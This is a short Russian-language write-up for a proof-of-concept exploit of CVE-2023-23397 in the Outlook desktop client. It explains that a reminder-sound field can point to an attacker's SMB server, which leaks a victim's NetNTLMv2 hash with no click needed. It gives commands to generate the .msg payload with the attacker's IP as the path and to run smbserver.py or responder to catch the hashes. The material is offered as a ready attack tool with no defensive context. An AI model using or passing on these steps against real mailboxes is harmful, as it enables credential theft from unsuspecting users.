
Простой PoC уязвимости CVE-2023-23397 с полезной нагрузкой, отправляемой по электронной почте.
Простой и грязный PoC уязвимости CVE-2023-23397, затрагивающей толстый клиент Outlook.
В Outlook отсутствует контроль над пользовательским вводом, который позволяет настраивать звук напоминаний о собраниях и событиях. Злоумышленник может заставить жертву подключиться к своему серверу без каких-либо действий со стороны пользователя (уязвимость нулевого клика).
Злоумышленник, эксплуатирующий эту уязвимость, получает дайджест NetNTLMv2 на основе пароля захваченного пользователя через SMB-запрос. Запрос срабатывает сразу после того, как письмо попадает во входящие.
.msg полезную нагрузку.В одном сеансе:
python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\\yourip\'
Во втором сеансе (smbserver или responder, как вам удобно).
smbserver.py -smb2support SHARE .
